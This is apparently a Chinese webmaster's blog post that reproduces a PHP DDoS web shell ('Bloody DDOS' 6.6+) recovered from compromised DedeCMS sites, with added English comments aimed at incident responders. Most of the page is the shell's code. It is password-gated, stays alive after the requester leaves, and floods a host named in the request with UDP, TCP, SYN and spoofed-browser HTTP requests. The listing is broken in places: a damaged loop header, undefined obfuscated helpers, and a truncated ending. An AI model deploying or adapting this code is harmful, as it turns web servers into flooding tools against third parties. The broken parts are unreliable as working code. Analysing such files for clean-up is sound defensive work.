维护 dede(织梦)系统的站长常常会看到一些陌生的文件,这些文件都是网站被攻击后黑客上传的代码。
文件的代码我就不改动了,以下是最原始的代码。
<?php
// Reviewer note (defensive): listing of a file recovered from a compromised
// site, annotated for incident responders. The code is left exactly as published.
//
// Shared secret that each act=... branch below compares with $_GET["pass"].
// It travels in the URL query string, so it is typically visible in
// web-server access logs.
$password="xxjh123";
// Address that the requested host name resolves to; echoed back by act=view.
$ip = gethostbyname($_SERVER["SERVER_NAME"]);
$ddos_version="6.6+";
//POWER-BY: the code originally carried the website the attacker was promoting; it has been temporarily changed to this site's address.
//Last modified BY QQ:11206923
//"Bloody DDOS" 6.6+ release, supports TCP, UDP, CC and other functions
// (The three comments above are translated from the Chinese text in the
// listing; signature matching should use the original bytes of the file.)
//
// State file kept beside the script. A key.txt sitting next to an unfamiliar
// PHP file is an artefact worth searching for during clean-up.
$key_file="key.txt";
// Create the state file (empty) when it is missing. The existence check uses
// the bare relative name, while write_file() prefixes this script's directory.
if(!is_file_exists($key_file)){
write_file($key_file,"",true);
}
// include runs key.txt as PHP and keeps its return value. Every write visible
// in this listing stores an empty string, so how the value could become "die"
// (tested in the attack loop) is not shown on the page.
$include_key_file = include $key_file;
// No act parameter: answer with a fixed string and stop, so a plain request
// to the file reveals nothing about its purpose.
if(!isset($_GET["act"])){
exit_and_print('www.liqingbo.cn');
}
// act=die: after the capability and password checks, empties key.txt and
// answers "died". The literal response and error strings in this branch are
// usable as search terms in captured traffic or on disk.
if($_GET["act"]=="die"){
// Bail out when fsockopen is unavailable (function_exists is also false for
// functions listed in php.ini disable_functions).
if(!is_function_exists("fsockopen")){exit_and_print("error:SHELL服务器缺少必要函数支持.");}
if(!is_function_exists("set_time_limit") or !is_function_exists("ignore_user_abort")){
exit_and_print("error:SHELL服务器无法启动自动攻击.");}
// Loose (<>) comparison of the trimmed query-string value with the hardcoded
// secret; @ hides the notice raised when "pass" is absent.
if(@strip($_GET["pass"])<>strip($password)){exit_and_print("error:SHELL密码错误,无法攻击.");}
write_file($key_file,"",true);
exit_and_print("died");
}
// act=view: status probe. After the same capability and password checks as
// act=die it answers "ok:" followed by the version string, the resolved
// server address and the value returned by including key.txt, separated by
// "|". A response body starting with "ok:" in that shape identifies this file.
if($_GET["act"]=="view"){
if(!is_function_exists("fsockopen")){exit_and_print("error:SHELL服务器缺少必要函数支持.");}
if(!is_function_exists("set_time_limit") or !is_function_exists("ignore_user_abort")){exit_and_print("error:SHELL服务器无法启动自动攻击.");}
if(@strip($_GET["pass"])<>strip($password)){exit_and_print("error:SHELL密码错误,无法攻击.");}
exit_and_print("ok:".$ddos_version."|".$ip."|".$include_key_file);
}
// act=attack: the traffic-generating branch. Observable artefacts for
// responders: request URLs carrying act, pass, ip, port, exec_time, att_size
// and att_* parameters; PHP workers that keep running after the client has
// gone; and outbound UDP/TCP connections from the web server to a host named
// in the request. Egress filtering on the web server and disabling fsockopen
// where the site does not need it limit what a file like this can do.
if($_GET["act"]=="attack"){
// Keep executing after the requester disconnects and lift the execution time
// limit. Both calls run before the password is checked.
ignore_user_abort (true);
set_time_limit(0);
$process_times = 0;
if(!isset($_GET["ip"]) or !isset($_GET["port"]) or !isset($_GET["exec_time"]) or !isset($_GET["att_size"])){exit_and_print("error:参数提交错误");}
if(@strip($_GET["pass"])<>strip($password)){exit_and_print("error:SHELL密码错误,无法攻击.");}
write_file($key_file,"",true);
// All request values are only trimmed; $rand holds the port despite its name.
$ip = gethostbyname($_GET["ip"]);
$rand = strip($_GET["port"]);
$exec_time = strip($_GET["exec_time"]);
$att_size= strip($_GET["att_size"]);
// The att_* parameters are optional; @ hides the notice when one is missing.
@$att_type= strip($_GET["att_type"]);
@$att_web= strip($_GET["att_web"]);
@$att_blqs= strip($_GET["att_blqs"]);
@$att_bljs= strip($_GET["att_bljs"]);
// Run window: from now until now + exec_time.
$time = time();
$max_time = $time+$exec_time;
$out="";
// NOTE(review): the loop header on the next line is damaged on the page (text
// between a '<' and a '>' appears to have been lost in extraction). It is left
// as published and is not valid PHP as shown. The surviving tail empties
// key.txt and leaves the loop once $max_time is exceeded.
for($i=0;$i $max_time){write_file($key_file,"",true);break;}
// Dispatch on att_type: "udp", "cc", any other non-"tcp" value, or "tcp".
if($att_type!=="tcp"){
if($att_type=="udp"){#UDP
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){fwrite($fp, $out);}
}
else if($att_type=="cc"){#CC
// The three obfuscated helper names used below are not defined in the visible
// listing; from their use they presumably derive host, port and request path
// from $att_web — not verifiable from this page.
$fp = fsockopen(oOoOOoOOoo00O0OOO0O($att_web), o0ooo0($att_web), $errno, $errstr, 5);
// Fixed header set: the User-Agent, Accept-Language and Referer shape below
// are constant across requests and can serve as a traffic signature.
$Aanvraag = "GET ".o0o0o0o0o0o0o0O0O0o0O0O0o0($att_web,$att_blqs,$att_bljs)." HTTP/1.1\r\n";
$Aanvraag .= "Referer: http://".oOoOOoOOoo00O0OOO0O($att_web)."/?".$out." \r\n";
$Aanvraag .= "Accept: */*\r\n";
$Aanvraag .= "Accept-Language: zh-CN, zh, *\r\n";
$Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
$Aanvraag .= "User-Agent: Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.1)\r\n";
$Aanvraag .= "Host: ".oOoOOoOOoo00O0OOO0O($att_web).":".o0ooo0($att_web)."\r\n";
$Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
fwrite($fp, $Aanvraag);
}else{#syn
/*
if($process_times == 1){
$fp = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
@socket_set_nonblock($fp);
$_ = explode('|', $att_size);
$nums = intval($_[0])?intval($_[0]):20;
$sleep = intval($_[1])?intval($_[1]):100;
}
for ($j = 0; $j < $nums; $j++)@socket_connect($fp, $ip, $rand);
usleep($sleep);
*/
// The block above is commented out in the published file; only the line below
// is live in this branch.
for ($j = 0; $j < 20; $j++)$fp = fsockopen("tcp://$ip", $rand, $errno, $errstr,0);
}
}else{#TCP
$fp = fsockopen("$ip", $rand, $errno, $errstr, 5);
if($fp){fputs($fp, $out);}
}
// fclose() is called whether or not the preceding fsockopen() succeeded.
fclose($fp);
// Stop condition driven by the value obtained from including key.txt.
}elseif($include_key_file=="die"){ die("I am dying!");}
}#END WHILE
// "over" is the final response body once the loop has ended.
@exit_and_print("over");
}
// Helper functions. On the page several definitions share physical lines (a
// closing brace is followed directly by the next `function`), and the closing
// brace of exit_and_print() sits on the line after this block.
//
// write_file($file, $contents, $flag): resolves $file against this script's
// directory, then appends $contents when $flag is loosely false and overwrites
// otherwise. Every call visible in the listing passes "" with $flag=true,
// which empties key.txt.
function write_file($file,$contents,$flag=false){ $file=dirname(__FILE__)."/".$file;
if ($flag==false){file_put_contents($file,$contents,FILE_APPEND);
}else{
file_put_contents($file,$contents);
}}function is_function_exists($a){return function_exists($a); // thin wrapper around function_exists()
}function strip($a){return trim($a); // thin wrapper around trim(); no other input filtering is applied
}function is_file_exists($a){return file_exists($a); // thin wrapper around file_exists(); the path is used as given
}function exit_and_print($a){return exit("".$a); // ends the request with $a as the response body
}function make_ddos_str($i){$o0o0o0O0O0O00O00o00o0oO0O0o = "abcdefghijklmnopqrstuvwxyz!@#$%^&*()_+QWERTYUIOP{}ASDFGHJKL:ZXCVBNM<>?/";
$oo0o0O0o00oOo0O0o0OoOOoO0OoOoO = "";
for($o0o0o0ooooooo=0;
$o0o0o0ooooooo
(代码在此处被截断。)
以上有许多的地方我也不明白是什么意思。
也欢迎了解的人一起研究或者指点。